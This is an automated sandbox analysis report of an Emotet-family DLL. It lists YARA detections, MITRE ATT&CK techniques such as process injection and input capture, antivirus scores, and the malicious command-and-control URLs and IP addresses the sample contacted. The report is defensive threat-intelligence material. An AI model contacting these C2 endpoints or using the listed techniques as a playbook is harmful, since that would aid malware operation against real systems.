Source: svchost.exe, 0000000E.00000002.766881069.000001A8AFA40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.767038489.000001A8AFB02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 8.2.rundll32.exe.2e20000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.4760000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.10000000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.a10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.4760000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.5a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.9f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.a10000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.5a0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.10000000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.2e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.335758052.0000000000A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.767352719.0000000004760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332283199.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331704119.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331683572.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341884681.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.335476233.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332269283.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.332361997.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.766565506.0000000000D60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.767779490.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.337892892.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341860463.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.331772344.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360786510.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360804490.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.360909118.0000000010000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	2 Masquerading	1 Input Capture	151 Security Software Discovery	Remote Services	1 Input Capture	Exfiltration Over Other Network Medium	12 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	14 Virtualization/Sandbox Evasion	LSASS Memory	14 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	1 Non-Standard Port	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	133 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Rundll32	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 File Deletion	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sample.dll	80%	Virustotal		Browse
sample.dll	70%	Metadefender		Browse
sample.dll	85%	ReversingLabs	Win32.Trojan.EmotetCrypt
sample.dll	100%	Avira	TR/Spy.Gen
sample.dll	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
16.2.rundll32.exe.4760000.1.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.580000.3.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.580000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
16.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
16.2.rundll32.exe.d60000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
2.2.rundll32.exe.a10000.1.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.10000000.5.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
2.2.rundll32.exe.10000000.2.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
8.2.rundll32.exe.2e40000.1.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll32.exe.580000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
2.2.rundll32.exe.9f0000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.5a0000.1.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.0.loaddll32.exe.5a0000.4.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
8.2.rundll32.exe.2e20000.0.unpack	100%	Avira	HEUR/AGEN.1215461	Download File
0.2.loaddll32.exe.5a0000.1.unpack	100%	Avira	HEUR/AGEN.1215461	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://www.windowsphone.com/	0%	URL Reputation	safe
https://157.245.145.87:443/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/	100%	Avira URL Cloud	malware
http://crl.ver)	0%	Avira URL Cloud	safe
https://%s.xboxlive.com	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://dynamic.t	0%	URL Reputation	safe
https://163.53.204.180:443/8vl90912xxgd2/vzcu9no9/	100%	Avira URL Cloud	malware
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://storeedgefd.dsx.mp.micr	0%	Avira URL Cloud	safe
https://%s.dnet.xboxlive.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://157.245.145.87:443/mhaw3s/lcird5tos00sh2ga75c/1qroeqh5aubke4qtdqg/iwwc/73g34bvsn/	true	Avira URL Cloud: malware	unknown
https://163.53.204.180:443/8vl90912xxgd2/vzcu9no9/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.windows.net/common	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362985130.000001E26E245000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	sample.dll	false	URL Reputation: safe	unknown
https://dev.ditu.live.com/REST/v1/Routes/	svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.xbox.com/purchase/xbox/	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	false		high
https://t0.tiles.ditu.live.com/tiles/gen	svchost.exe, 0000000B.00000002.363247965.000001E26E24E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362936248.000001E26E248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/	svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.windowsphone.com/	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	false	URL Reputation: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362985130.000001E26E245000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/REST/v1/Routes/Walking	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000005.00000002.678223626.000001EE1C466000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.770223866.00000295439CA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363203777.000001E26E213000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=	svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362989402.000001E26E241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	false		high
https://profile.xboxlive.com/users/batch/profile/settings	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	false		high
https://%s.xboxlive.com	svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000002.363247965.000001E26E24E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362936248.000001E26E248000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=	svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000003.362958279.000001E26E25A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.xbox.com/	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.573592981.0000029548785000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.563821193.0000029548785000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, DataStore.edb.13.dr	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	sample.dll	false	URL Reputation: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=	svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.m	DataStore.edb.13.dr	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/	svchost.exe, 0000000B.00000003.362974573.000001E26E240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362989402.000001E26E241000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dynamic.t	svchost.exe, 0000000B.00000002.363263870.000001E26E264000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363241068.000001E26E242000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	sample.dll	false	URL Reputation: safe	unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0D	sample.dll	false	URL Reputation: safe	unknown
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen	svchost.exe, 0000000B.00000003.341135545.000001E26E232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.363234025.000001E26E23B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://storeedgefd.dsx.mp.micr	svchost.exe, 0000000D.00000003.573546421.0000029548742000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=	svchost.exe, 0000000B.00000002.363256486.000001E26E25D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.362944843.000001E26E25C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://activity.windows.com	svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.bingmapsportal.com	svchost.exe, 0000000B.00000002.363203777.000001E26E213000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dev.ditu.live.com/REST/v1/Locations	svchost.exe, 0000000B.00000003.362927756.000001E26E260000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 0000000B.00000002.363237135.000001E26E23D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://%s.dnet.xboxlive.com	svchost.exe, 00000006.00000002.766941806.000002984023E000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 0000000B.00000003.362958279.000001E26E25A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
116.202.10.123	unknown	Germany	24940	HETZNER-ASDE	true
203.157.152.9	unknown	Thailand	9649	MOPH-TH-APInformationTechnologyOfficeSG	true
91.93.3.85	unknown	Turkey	34984	TELLCOM-ASTR	true
172.96.190.154	unknown	Canada	59253	LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG	true
109.99.146.210	unknown	Romania	9050	RTDBucharestRomaniaRO	true
190.107.118.125	unknown	Argentina	28015	MERCOCOMUNICACIONESAR	true
163.53.204.180	unknown	India	58898	RAINBOWISP-ASRainbowcommunicationsIndiaPvtLtdIN	true
157.245.145.87	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
190.55.186.229	unknown	Argentina	27747	TelecentroSAAR	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	676610
Start date and time: 01/08/202213:41:07	2022-08-01 13:41:07 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	sample (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@26/27@0/11
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 94.9%) Quality average: 70.8% Quality standard deviation: 25.8%
HCA Information:	Successful, ratio: 94% Number of executed functions: 7 Number of non-executed functions: 84
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86, 52.242.101.226, 20.54.89.106, 20.223.24.244, 40.125.122.176
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:42:45	API Interceptor	14x Sleep call for process: svchost.exe modified
13:43:58	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
116.202.10.123	NONAME.doc	Get hash	malicious	Browse
	vga64k.exe	Get hash	malicious	Browse
	RpcNs4.exe	Get hash	malicious	Browse
	sample1.doc	Get hash	malicious	Browse
	MV9tCJw8Xr.exe	Get hash	malicious	Browse
	AWESHBBET4UoPiY9.doc	Get hash	malicious	Browse
203.157.152.9	zGeK5so94c.dll	Get hash	malicious	Browse	203.157.152.9:7080/k8idqdr2/
	Bestellung.doc	Get hash	malicious	Browse	203.157.152.9:7080/fp6mnzkaqr6g444l/72u9p3zs7/g2jlp29e1gun28tdsj/98qlj89cyfd5f3jv/gfxmq8g7uq109a/
	Beauftragung.doc	Get hash	malicious	Browse	203.157.152.9:7080/1mknma6mw3iwffexp2/
	Reservierung.doc	Get hash	malicious	Browse	203.157.152.9:7080/6eve8qas5/0i5mfaii/p8bez9p65uc19f4/grju6ta/
	Beorderung.doc	Get hash	malicious	Browse	203.157.152.9:7080/xjj84/c3o6r1ebhyxncr9/9sjisujiufchwydnol9/rkuxo00mhg/
	Bestellung.doc	Get hash	malicious	Browse	203.157.152.9:7080/y4p99euagxraa4zj/2wbjd3933k44x/1is5p89u2lc009/atph/h2r0ok8wa30trloqlf9/
	Inv DK448.doc	Get hash	malicious	Browse	203.157.152.9:7080/3lec7urzx75mbq0/jwg3osdiklskv3/
	Invoice S2517158.doc	Get hash	malicious	Browse	203.157.152.9:7080/nqu8y0186o53/1aptxcpbn3iz11tn/ulw3e69cw2/
	http://xichengkeji.top/classic-retro-l8swk/3926bosets0n4/u2cfhti77-96	Get hash	malicious	Browse	203.157.152.9:7080/m8k9od75wi4wt2s131/ldx9ip66uu7zrrcv1qt/dx6l/aupcslxxe4sj3op4i/k3lns8t/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MOPH-TH-APInformationTechnologyOfficeSG	hefxwPNVtd	Get hash	malicious	Browse	203.157.41.23
	sora.arm7	Get hash	malicious	Browse	203.157.53.30
	sora.arm	Get hash	malicious	Browse	203.157.28.69
	miori.x86-20220703-2150	Get hash	malicious	Browse	203.157.53.57
	sora.arm	Get hash	malicious	Browse	203.157.53.55
	arm	Get hash	malicious	Browse	203.157.53.60
	faiN1qtW6V	Get hash	malicious	Browse	203.157.28.52
	qbG0s1MD7I	Get hash	malicious	Browse	203.157.132.250
	pandora.arm7	Get hash	malicious	Browse	203.157.41.46
	AptpclzbLE	Get hash	malicious	Browse	203.157.53.65
	1L3nRZNIVm	Get hash	malicious	Browse	203.157.28.74
	arm	Get hash	malicious	Browse	203.157.53.18
	PEMM2hMYY8	Get hash	malicious	Browse	203.157.28.55
	0kF6H2MsJs	Get hash	malicious	Browse	203.157.53.19
	QQnyJRqHMq	Get hash	malicious	Browse	203.157.53.21
	911.arm	Get hash	malicious	Browse	203.157.28.68
	beamer.arm7-20211121-1750	Get hash	malicious	Browse	203.157.28.55
	arm-20211121-1750	Get hash	malicious	Browse	203.157.77.21
	x86-20211103-0152	Get hash	malicious	Browse	203.157.28.66
	qalTySElfj	Get hash	malicious	Browse	203.157.28.53
HETZNER-ASDE	delphi.exe	Get hash	malicious	Browse	144.76.115.36
	Nm0KQ1zXSJ.exe	Get hash	malicious	Browse	148.251.234.93
	Q7o1zVivlb.exe	Get hash	malicious	Browse	116.202.178.170
	V5ZWycsMJN.exe	Get hash	malicious	Browse	116.202.178.170
	ooFq6haH8K.exe	Get hash	malicious	Browse	148.251.234.83
	CFCAB36F73560B2D15B6C266FEAAF0195A6E0D18C22AA.exe	Get hash	malicious	Browse	148.251.234.93
	b5839240f0daebab303246529edc72bc701fc3c4572a4.exe	Get hash	malicious	Browse	116.202.178.170
	feQUx4XlYP.exe	Get hash	malicious	Browse	159.69.102.223
	8fdqRFpq2z.exe	Get hash	malicious	Browse	116.202.178.170
